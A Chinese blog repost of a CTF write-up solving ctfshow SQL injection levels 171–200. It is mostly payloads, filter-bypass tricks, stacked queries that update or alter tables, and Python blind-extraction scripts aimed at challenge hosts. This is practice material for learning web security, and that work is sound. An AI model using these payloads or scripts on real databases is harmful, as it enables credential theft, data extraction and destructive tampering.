CTFSHOW sql注入(一)

2021/10/4 19:10:58

本文主要是介绍CTFSHOW sql注入(一),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!


title: CTFSHOW-sql注入(一)
data: 2021-09-15
tags: CTF-web


CTFSHOW sql注入(一)

开始一周的高强度sql注入训练,先从ctfshow 的基础开始。

包含了CTFSHOW sql注入的 170-200题。

这里都是sql注入的一些基本知识点。主要是了解sql注入的常见题型。

题目

web 171(万能密码)

万能密码:
  1'or 1=1-- -

web 172(过滤回显内容)

这里看出有一定的waf,我们并不能在username里面输入flag且返回的列里面也不能有flag。那么我们已知flag在ctfshow_user2表中,且列名为flag。直接编码即可。

payload:
1' union select to_base64(username),password from ctfshow_user2 -- -

这里有一个细节就是如果我们采用的是get传参的方式的话,那么我们使用#时候需要使用%23。否则不会杯传到数据库中当作注释使用。

web 173

payload:
1' union select 1,2,group_concat(password) from ctfshow_user3%23

group_concat()直接把所有password连起来就行了。

web 174(盲注+regexp)

这个题首先,没判断出来是盲注。主要还是参考了Y4师傅的WP。但是最后一个Y4师傅是靠经验推断flag在第二十三行。这里我们采用一个正则匹配,就不用去猜flag在哪里了。

# @Author:k1he
import requests

url = "http://60e5e391-09c0-4ed1-a9a2-57d8e70d4c64.challenge.ctf.show:8080/api/v4.php?id=1"


flag = ''

for i in range(1,100):
    min =32
    max =127
    while 1:
        mid = (max+min)>>1
        if(min == mid):
            flag += chr(mid)
            print(flag)
            break
        #payload = "'and ascii(substr((select database()),{},1))<{}-- -".format(i,mid)
        payload = "'and ascii(substr((select group_concat(password) from ctfshow_user4 where password regexp('^ctf')),{},1))<{}-- -".format(i,mid)
        res = requests.get(url+payload)
        if "admin" in res.text:
            max = mid
        else:
            min = mid
#库名 
#ctfshow_web
#表名
#ctfshow_user4
#列名
#id,username,password
#flag
#ctfshow{35c495e4-d5bc-450c-a16a-c51f5777633f} 

web 175(时间盲注)

看题目。返回内容不能有ascii为0-127的字符。直接把回显关了。只能直接采用盲注了。但是这里有一个新的问题是,怎么敲都是查询失败。

# -*- coding: utf-8 -*-
# @Author: k1he
# @Date:   2021-09-18 17:30:35
# @Last Modified by:   k1he
# @Last Modified time: 2021-09-18 17:47:28
import requests
url = "http://617002ea-275b-4340-9ced-18d46d869a56.challenge.ctf.show:8080/api/v5.php?id=1"
flag = ''
for i in range(1,100):
    max = 127
    min = 32
    while 1:
        mid = (max+min)>>1
        if(min == mid):
            flag += chr(mid)
            print(flag)
            break
        #表名
        #paylaod = "1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},sleep(0.6),0)-- -".format(i,mid)
        #列名
        #paylaod = "1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_user5'),{},1))<{},sleep(0.6),0)-- -".format(i,mid)
        #id,username,password
        #flag
        paylaod = "1'and if(ascii(substr((select group_concat(password) from ctfshow_user5 where password regexp('^ctf')),{},1))<{},sleep(0.6),0)-- -".format(i,mid)
        #ctfshow{97c033fb-e734-4ff5-894b-37c1e3145f8e}
        try:
            res = requests.get(url=url+paylaod,timeout=0.5)
            min = mid
        except:
            max = mid
#库名
#ctfshow_web
#表名
#ctfshow_user5
#列名
#id,user,password

web 176(大小写绕过)

payload:
1'or 1=1%23

payload:
1' union sElect 1,2,group_concat(password) from ctfshow_user%23

web 177(空格过滤)

payload:
1'or%091=1%23

payload:
1'union%09sElect%091,2,group_concat(password)%09from%09ctfshow_user%23

贴个小tips:

绕过空格姿势:(暂时只想起来这么多后面再补)
%09 %0a %0c %0b %0d /**/

web 178()

暂时这题不知道过滤了什么。
payload:
1'or%091=1%23

payload:
1'union%09select%091,2,group_concat(password)%09from%09ctfshow_user%23

web 179(过滤%0a,%09)

简单测试过后,很容易发现过滤了%0a,%09。那么我们采用手工闭合或者%0c

payload:
1'or'1'='1'%23
1'or(1)=(1)%23

payload:
1'union%0cselect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%23

web 180(过滤注释#,–+)

payload:
1'or'1'='1'--%0c-

payload:
1'union%0cselect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user--%0c-

web 181-182(过滤select)

这题直接给出了过滤列表了。

 |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i

可以看到最关键的select被过滤了。

这里卡住了,因为没有select太不好操作了。而handler需要能够连续执行语句的时候才能用。

去看了看师傅们的WP。

payload:
-1'or(id=26)and'1'='1

这个payload读一下还是能读懂的。

web 183(正则比较注入)

$sql = "select count(pass) from ".$_POST['tableName'].";";
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
  }

可以看到这题有回显,并且返回pass的条目。

这里进行了好久的测试。刚开始用的chr(32)~chr(127)。但是发现因为我们使用的是正则匹配,因此我们的通配符会被算上。直接雪崩。

后面采用了最简单的枚举法。

# -*- coding: utf-8 -*-
# @Author: k1he
# @Date:   2021-09-18 20:25:26
# @Last Modified by:   k1he
# @Last Modified time: 2021-09-18 20:47:53
import requests
url ="http://3df76f1c-80a4-442b-921e-7c8e77b7be14.challenge.ctf.show:8080/select-waf.php"
flag = ""
letter = '0123456789abcdefghijklmnopqrstuvwxyz-{}'
for i in range(0,40):  #此处可适当调大
    for j in letter:
        temp_flag = flag+j
        data = {
            "tableName":"(ctfshow_user)where(pass)regexp('^ctfshow{}')".format(temp_flag)
        }
        r = requests.post(url=url,data=data)

        #print(r.text)
        #print(data['tableName'])
        if "$user_count = 1;" in r.text:
            flag += j
            print("ctfshow"+flag)
            break
        else:
            continue
#ctfshow{2a41856e-f78f-4805-9c6b-3c159f2eed50}

web 184(having代替where,like盲注,十六进制替代)

此题在上一题的基础上过滤了单双引号。where。

并且因为没有了单双引号,因此我们无法继续采用正则匹配。因此我们只能使用非字符串的方式来匹配。那么选择使用16进制来匹配。

# -*- coding: utf-8 -*-
# @Author: k1he
# @Date:   2021-09-18 21:01:32
# @Last Modified by:   k1he
# @Last Modified time: 2021-09-18 21:15:25
import requests
import sys
url = "http://345bf49b-6769-4ef8-83bd-b502bb7928fb.challenge.ctf.show:8080/select-waf.php"

letter = "0123456789abcdefghijklmnopqrstuvwxyz-{}"
def asc2hex(s):
    a1 = ''
    a2 = ''
    for i in s:
        a1+=hex(ord(i))
    a2 = a1.replace("0x","")
    return a2

flag = "ctfshow{"
for i in range(0,100):
    for j in letter:
        temp_flag = flag+j
        data ={
            "tableName":"ctfshow_user group by pass having pass like ({})".format("0x"+asc2hex(temp_flag+"%"))
        }
        #print(data["tableName"])

        r = requests.post(url=url,data=data)
        if "$user_count = 1;" in r.text:
            flag += j
            print(flag)
            break
        else:
            continue

#ctfshow{ff9725af-75f3-4aad-b5a4-176d7bf6c717} 

web 185-186(true代替数字,concat+chr代替引号)

function waf($str){
   return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
}

这里可以看出在上一题的基础上更过滤了数字0-9.

抄了一个脚本,师傅们tql.

这里的核心在like后面使用了concat+chr的方式来得到字符串。

然后数字使用了true+true=2这种方式来绕过。

总体就是

like concat(chr(true+true),chr(true+true)) —>like "ctfshow{"—>得到flag
# -*- coding: utf-8 -*-
# @Author: k1he
# @Date:   2021-09-18 21:01:32
# @Last Modified by:   k1he
# @Last Modified time: 2021-09-19 10:23:39
import requests
import sys

def createNum(n):
    num = "true"
    if n == 1:
        return "true"
    else:
        for i in range(n - 1):
            num += "+true"
    return num


def createstrNum(m):
    _str = ""
    for j in m:
        _str += ",chr(" + createNum(ord(j)) + ")"
    return _str[1:]


url = "http://6e155536-4130-4c33-899e-241450edf3b5.challenge.ctf.show:8080/select-waf.php"
letter = "0123456789abcdefghijklmnopqrstuvwxyz-{}"
flag = "ctfshow{"
for i in range(100):
    for j in letter:
        data = {
            'tableName': 'ctfshow_user group by pass having pass like concat({})'.format(createstrNum(flag + j +"%"))
        }
        res = requests.post(url=url, data=data).text
        #print(data["tableName"])
        if "$user_count = 1;" in res:
            flag += j
            print(flag)
            break
        if j == "}":
            sys.exit()
#ctfshow{55d05897-933b-4796-99f3-5cfe49a5436a}

web 187(md5注入)

 $sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";

    $username = $_POST['username'];
    $password = md5($_POST['password'],true);

    //只有admin可以获得flag
    if($username!='admin'){
        $ret['msg']='用户名不存在';
        die(json_encode($ret));
    } 

这里问题主要在这个MD5函数上面。因为MD5函数存在两个参数,其中第二个参数默认为false。当其为true的时候,会返回16位原始二进制字符串。因此这里我们需要找到一个转换为原始16位二进制字符串后满足我们的注入。

可以看到很明显这里我们存在单引号,那么可以直接注入了。

注入后就变成了

$sql = "select count(*) from ctfshow_user where username = 'admin' and password= ''or'6xxxxxx'";

这里只要是数字1之类的都会被判断为true。因此成功登陆了。

payload:
username:admin
password:ffifdyop


payload:
username:admin
password:129581926211651571912466741651878684928

抓包即拿到flag

web 188(mysql弱比较)

   $sql = "select pass from ctfshow_user where username = {$username}";
  //用户名检测
  if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==intval($password)){
      $ret['msg']='登陆成功';
      array_push($ret['data'], array('flag'=>$flag));
    }
      

可以看到这里登陆成功就有flag。

第一想法是对admin的密码进行修改。然后登陆成功即可。

}and update ctshow_user set pass=123 where username = admin%23

但是行不通。看着这么多眼熟的函数,上网搜了搜,mysql里面也存在弱比较。

1.字符串当作数字处理
  即当mysql中字符串与数字做比较的时候,会将字符串当作数字来比较。如123bac会当作123处理。
  因此我们在查询的时候即使username=0,也会返回一些以0开头的数据。
2.品一下下面的句子。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BUEcYdPs-1633341285782)(https://i.loli.net/2021/09/19/YDRMFk1vHInS2wL.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eQZ8W7KS-1633341285784)(https://i.loli.net/2021/09/19/aNj8pICesuEyKQr.png)]

payload1:
username=0&password=0
payload2:
username=1||1&password=0

web 189(load_file+regexp盲注)

  $sql = "select pass from ctfshow_user where username = {$username}";
  if(preg_match('/select|and| |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\x26|\x7c|or|into|from|where|join|sleep|benchmark/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }

可以很清晰得看出这里没有空格了。所有空格都没了。在题目下给了一个hint:flag在/api/index.php中。

那么合理猜测我们需要去读index.php的内容。然后看load_file没有被ban掉。

根据目录应该时/var/www/html/api/index.php

测试了一下。回显只有查询失败和密码错误。那么想到了盲注。配合regexp使用。

if(load_file("/var/www/html/api/index.php")regexp("ctfshow{"),0,1)#

上脚本跑

# -*- coding: utf-8 -*-
# @Author: k1he
# @Date:   2021-09-18 20:25:26
# @Last Modified by:   k1he
# @Last Modified time: 2021-09-19 15:55:45
import requests
url ="http://672fae7a-35db-4eca-8187-c6d1bcd4d481.challenge.ctf.show:8080/api/index.php"
flag = "ctfshow{"
letter = '0123456789abcdefghijklmnopqrstuvwxyz-{}'
for i in range(0,60):  #此处可适当调大
    for j in letter:
        temp_flag = flag+j
        data = {
            "username": "if(load_file('/var/www/html/api/index.php')regexp('{}'),0,1)#".format(temp_flag),
            "password": 0,
        }
        r = requests.post(url=url,data=data)
        #print(r.text)
        #print(data['username'])
        if "密码错误" in r.json()['msg']:
            flag += j
            print(flag)
            break
        else:
            continue
#ctfshow{335a466f-e9f5-4840-9e17-eefddd2eed9e}

这里还学到一点就是返回的是json的时候该怎么处理。

web 190(json类型盲注)

$sql = "select pass from ctfshow_user where username = '{$username}'";

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }

  //TODO:感觉少了个啥,奇怪

测试了一下,本题多了一个用户名判断。应该是强比较判断。盲注。

这里手工测试一下,很容易发现用户名处存在盲注。

只存在"密码错误"和"用户名不存在"。当我们用户名处成功注入时返回密码错误。

# -*- coding: utf-8 -*-
# @Author: k1he
# @Date:   2021-09-18 21:01:32
# @Last Modified by:   k1he
# @Last Modified time: 2021-09-19 15:25:03
import requests
import sys

url = "http://ec825111-5f1a-434e-832f-7c2c48c558ed.challenge.ctf.show:8080/api/"
flag = ""
for i in range(1,60):
    max = 127
    min = 32
    while 1:
        mid = (max+min)>>1
        if(min == mid):
            flag += chr(mid)
            print(flag)
            break
        #payload = "admin'and (ascii(substr((select database()),{},1))<{})#".format(i,mid)
        #ctfshow_web
        #payload = "admin'and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid)
        #ctfshow_fl0g
        #payload = "admin'and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i,mid)
        #id,f1ag
        payload = "admin'and (ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{})#".format(i,mid)

        data = {
            "username":payload,
            "password":0,
        }
        res = requests.post(url = url,data =data)
        if "密码错误" == res.json()['msg']:
            max = mid
        else:
            min = mid 
#ctfshow{41c6d58b-1795-41ba-8d5d-56be249791aa} 

web 191(过滤ascii)

    if(preg_match('/file|into|ascii/i', $username)){
        $ret['msg']='用户名非法';
        die(json_encode($ret));
    }

增加了盲注过滤。没什么影响。ascii用ord替换。脚本一把梭哈。

# -*- coding: utf-8 -*-
# @Author: k1he
# @Date:   2021-09-18 20:25:26
# @Last Modified by:   k1he
# @Last Modified time: 2021-09-19 16:22:24
import requests
url ="http://9a8a7166-7150-4c7a-98ef-d4da2ef7781b.challenge.ctf.show:8080/api/"
flag = ""

for i in range(1,60):
    max = 127
    min = 32
    while 1:
        mid = (max+min)>>1
        if(mid == min):
            flag += chr(mid)
            print(flag)
            if(chr(mid)=="{"):
                exit()
            break
        #payload = "admin'and ascii(substr((select database()),{},1))>{}#".format(i,mid)
        #payload = "admin'and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{}#".format(i,mid)
        #ctfshow_fl0g
        #payload = "admin'and ord(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{}#".format(i,mid)
        #id,f1ag
        payload = "admin'and ord(substr((select group_concat(f1ag) from ctfshow_fl0g),{},1))<{}#".format(i,mid)
        data = {
            "username":payload,
            "password":0,
        }
        res = requests.post(url=url,data=data)
        #print(res.text)
        #print(payload)
        if "密码错误" in res.json()['msg']:
            max = mid
        else:
            min = mid


web 192(正则截断注入)

admin' and if(substr((select group_concat(f1ag) from ctfshow_fl0g),{i},1)regexp('{j}'),1,2)='1"
# -*- coding: utf-8 -*-
# @Author: k1he
# @Date:   2021-09-18 20:25:26
# @Last Modified by:   k1he
# @Last Modified time: 2021-09-19 16:51:22
import requests
url ="http://a64eba92-a4e4-4b96-b11d-d5ad34cce45b.challenge.ctf.show:8080/api/"
flag = ""
letter = '0123456789abcdefghijklmnopqrstuvwxyz-{}'
for i in range(0,60):  #此处可适当调大
    for j in letter:
        temp_flag = flag+j
        data = {
            "username": "admin'and if(substr((select group_concat(f1ag) from ctfshow_fl0g where f1ag regexp('ctfshow')),{},1)='{}',0,1)#".format(i,j),
            "password": 0,
        }
        r = requests.post(url=url,data=data)
        #print(r.text)
        #print(data['username'])
        if "用户名不存在" in r.json()['msg']:
            flag += j
            print(flag)
            break
        else:
            continue
#ctfshow{da178f3e-bfd6-42dc-89a8-f507be312c6f}

web 193-194(like注入)

讲道理这里的话上一题的Payload将substr换成mid就能用了。但是不知道为什么没打通。

选择了抄师傅们的脚本。这里用的是like注入。但是好像like注入确实比regexp注入好理解。

# -*- coding: utf-8 -*-
# @Author: k1he
# @Date:   2021-09-18 20:25:26
# @Last Modified by:   k1he
# @Last Modified time: 2021-09-19 18:39:19
import requests

url='http://40ebd4e2-e4d3-41d1-80e7-421bc0d3dc26.challenge.ctf.show:8080/api/'
flag=""
letter = "0123456789abcdefghijklmnopqrstuvwxyz-,{}_"
for i in range(0,100):
    for j in letter:
        #payload="admin' and if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}',1,0)#".format(flag+j+"%")
        #ctfshow_flxg
        #payload="admin' and if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg') like '{}',1,0)#".format(flag+j+"%")
        #id,f1ag
        payload="admin' and if((select group_concat(f1ag) from ctfshow_flxg) like '{}',1,0)-- -".format(flag+j+"%")
        #ctfshow{7259adb9-4f34-4c72-bbeb-0fd74517cd3c}
        data={
            'username':payload,
            'password':1
        }
        #print(payload)
        r=requests.post(url=url,data=data)
        #print(r.text)
        if "密码错误" in r.json()['msg']:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break


web 195(堆叠注入-反单引号)

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }

  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }
      

这里开启堆叠注入了。堆叠注入不是很理解。只能边看WP边学了。

堆叠注入的核心就是可以执行多个语句。

那么这里我们并不知道密码,可以利用堆叠注入进行一个更改密码的语句执行。

之前我一直以为反单引号内部代表表名。后面查了一下,反单引号用于区分保留字。

对于本题也就是pass代表pass字段。`

payload:
username:0;update`ctfshow_user`set`pass`=1;
password:1

点两下登陆就行了。

web 196(堆叠注入-限制长度)

  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if(strlen($username)>16){
    $ret['msg']='用户名不能超过16个字符';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }
      

这里目前还没问到预期解。。

据说这题没有ban select。但是正则里面确实写了ban select。问了下群主,忘了ban select....

因此这里是非预期:
payload:
username:0;select(1);
password:1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fPPGM5ON-1633341285787)(https://i.loli.net/2021/09/19/UJrVQihSEH8NFsg.png)]

web 197-198(堆叠注入-更改列名)

  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set//i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

这里可以看出没有了update我们无法更改密码了。但是这个判断的话我们可以通过将pass字段和id字段互换。进而通过爆破id就能拿到flag。

paylaod:
username:0;alter table `ctfshow_user` change `pass` `k1he` varchar(255); alter table `ctfshow_user` change `id` `pass` varchar(255);

web 199-200

感觉这个主要是出题的问题。好像190-200都能用这个通杀。

因为这里作比较的主要是查询后的结果和传入的参数比较。又有row[0]的存在。

因此我们可以使用这个非预期payload。

payload:
username:0;show tables;
password:ctfshow_user



这篇关于CTFSHOW sql注入(一)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程